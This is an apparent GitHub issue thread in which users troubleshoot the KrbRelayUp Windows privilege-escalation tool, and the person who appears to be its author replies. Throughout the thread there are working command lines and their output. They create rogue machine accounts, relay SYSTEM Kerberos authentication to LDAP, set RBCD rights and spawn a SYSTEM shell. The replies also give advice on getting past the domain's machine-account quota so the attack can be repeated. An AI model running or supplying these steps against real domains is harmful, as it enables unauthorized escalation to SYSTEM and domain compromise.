Could not find computer account SID:

Question

Could not find computer account SID:

dreizehnutters opened this issue 2 years ago · comments

Hey,

I just tried the POC for a costumer. Unfortunately the method does not seem to work on the Windows 10 Enterprise 19042 Client.
LDAP signing is disabled

Frank Nusko · Answer 1 · Wed Apr 27 2022 19:52:01 GMT+0800 (China Standard Time)

Are you sure you used the FQDN for -Domain? I get this error if the Domain is not correct (i.e. using windomain when it should be windomain.local)

PyroChiliarch · Answer 2 · Wed Apr 27 2022 23:12:55 GMT+0800 (China Standard Time)

I had this issue, started working after a reboot.

qiminghe · Answer 3 · Tue May 03 2022 01:28:01 GMT+0800 (China Standard Time)

same issue here. Let's say I have a host=laptop123 on AD domain=mycompany.com, tried following neither works:
KrbRelayUp.exe relay -d laptop123.local -CreateNewComputerAccount -ComputerName evilhost$ -ComputerPassword pass0123
[+] Computer account "evilhost$" added with password "pass0123"
[-] Could not find computer account SID:
[-] Index was out of range. Must be non-negative and less than the size of the collection.
Parameter name: index
KrbRelayUp.exe relay -d mycompany.com -CreateNewComputerAccount -ComputerName evilhost$ -ComputerPassword pass0123
[-] Could not add new computer account:
[-] The user has insufficient access rights.
Help?

Mor Davidovich · Answer 4 · Tue May 03 2022 01:41:22 GMT+0800 (China Standard Time)

same issue here. Let's say I have a host=laptop123 on AD domain=mycompany.com, tried following neither works: KrbRelayUp.exe relay -d laptop123.local -CreateNewComputerAccount -ComputerName evilhost$ -ComputerPassword pass0123 [+] Computer account "evilhost$" added with password "pass0123" [-] Could not find computer account SID: [-] Index was out of range. Must be non-negative and less than the size of the collection. Parameter name: index KrbRelayUp.exe relay -d mycompany.com -CreateNewComputerAccount -ComputerName evilhost$ -ComputerPassword pass0123 [-] Could not add new computer account: [-] The user has insufficient access rights. Help?

In the first command your domain was incorrect so it couldn't find the SID of the new computer in that domain (cause it doesn't exist) so this why it failed.
In the second command the domain flag was correct but it couldn't add the "evilhost$" computer because it's already exist (it was added in the first command).
Try either remove the -CreateNewComputerAccount from the second command or specify a new -computerName:

KrbRelayUp.exe relay -d mycompany.com -ComputerName evilhost$ -ComputerPassword pass0123
KrbRelayUp.exe relay -d mycompany.com -CreateNewComputerAccount -ComputerName evilhost222$ -ComputerPassword pass0123

In the next version (should be out this week) the tool will lookup the domain by itself so this kind of confusion would be less likely to happen again.

qiminghe · Answer 5 · Tue May 03 2022 02:53:50 GMT+0800 (China Standard Time)

Tried two revisions, getting the same error:
[-] Could not add new computer account:
[-] The user has insufficient access rights.
Do I have to be Win local admin (run as admin) for the command? Tried that, does not help either
Any debug/log option I can turn on for troubleshooting? Regarding domain lookup, is it just:
PS>systeminfo | Select-String 'Domain'
which I used here.

qiminghe · Answer 6 · Wed May 04 2022 20:54:04 GMT+0800 (China Standard Time)

I pulled out the latest and re-run the excutable and notice following option dispearing
-c (--CreateNewComputerAccount)
Assuming I am running the executable from existing laptop123 I own:
.\KrbRelayUp.exe relay -d mycompany.com -cn laptop123$ -cp pass0123
[+] Rewriting function table
[+] Rewriting PEB
[+] Init COM server
[+] Register COM server
[+] Forcing SYSTEM authentication
[+] Got Krb Auth from NT/SYSTEM. Relying to LDAP now...
[+] LDAP session established
[+] RBCD rights added successfully
[+] Run the spawn method for SYSTEM shell:
./KrbRelayUp spawn -d mycompany.com -cn laptop123$ -cp pass0123
However, when running the last suggested command, I am getting following error:
KrbRelayUp - Relaying you to SYSTEM
[-] KRB-ERROR (24) : KDC_ERR_PREAUTH_FAILED:
Do I have to do anything about laptop's firewall? I can verify AD server port 389/88 are all open. Anything else I need to check?

Mor Davidovich · Answer 7 · Wed May 04 2022 21:03:26 GMT+0800 (China Standard Time)

[-] KRB-ERROR (24) : KDC_ERR_PREAUTH_FAILED means that the password specified for the laptop123$ machine account is incorrect.

the -cn and -cp flags are for the separate machine account you own or the one you added if you specified -c to create a new one (not the one you are executing KrbRelayUp from)

run those 2 commands and it should work:

.\KrbRelayUp.exe relay -d mycompany.com -c -cn newcomputer$ -cp newpass0123
.\KrbRelayUp.exe spawn -d mycompany.com -cn newcomputer$ -cp newpass0123

qiminghe · Answer 8 · Wed May 04 2022 21:18:11 GMT+0800 (China Standard Time)

when running the following command to createnewcomputeraccount (-c)
\KrbRelayUp.exe relay -d mycompany.com -c -cn newcomputer$ -cp newpass0123
I fall back to old error below (still not sure what causing problem without debug/logs)
KrbRelayUp - Relaying you to SYSTEM
[-] Could not add new computer account:
[-] The user has insufficient access rights.

Mor Davidovich · Answer 9 · Thu May 05 2022 13:12:22 GMT+0800 (China Standard Time)

Insufficient privileges to add a computer account usually is due to either a restriction in the domain where regular users are not allowed to add a new machine accout (this is actually one of the mitigation suggestions for this attack) or because your user have reached the maximum quota for new computer accounts it may add which is 10 by default (this is my guess for your specific issue).
You can either delete via domain admin from the DC all of the computer accounts you've added and that will reset your user's quata so you can perform the attack again or use another domain user to perform the attack with.

qiminghe · Answer 10 · Thu May 05 2022 20:25:51 GMT+0800 (China Standard Time)

I verified:

AD ldap:// is bind-able to 389, assuming LDAP signing is NOT enforced(deafult).
query for 'ms-DS-MachineAccountQuota' which is 10(default) as follows:
PS>Get-ADObject -Identity ((Get-ADDomain).distinguishedname) -Properties ms-DS-MachineAccountQuota
DistinguishedName : DC=xxx,DC=xxx,DC=xxx,DC=xxx
ms-DS-MachineAccountQuota : 10
Name : corp
ObjectClass : domainDNS
ObjectGUID : xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
How do I query AD to see if I have reached my quota? I have seen following error 10+ times though:
[+]Computer account "evilhost$" added with password xxxx
[-]Could not find computer account SID:
Does this mean 'evilhost' are successfully added? If so, how to AD-query for it?
The window machine running the script has Full DN as: CN=laptop123,OU=xxx,OU=xxx,DC=xxx,DC=xxx,DC=xxx,DC=xxx
Do I have to provide KrbRelayUp with full DN? like -cn CN=evilhost,OU=xxx,....? Please advise. Thx

Mor Davidovich · Answer 11 · Fri May 06 2022 20:43:02 GMT+0800 (China Standard Time)

Could you check the previous commands using new low priv user? (which probably still hadn't reached it's ms-DS-MachineAccountQuota limit)
Other route you could take is login in to your DC using a domain admin and manually deleting all of the machine accounts added by the previous KrbRelayUp runs, this will let your user add new machine accounts again.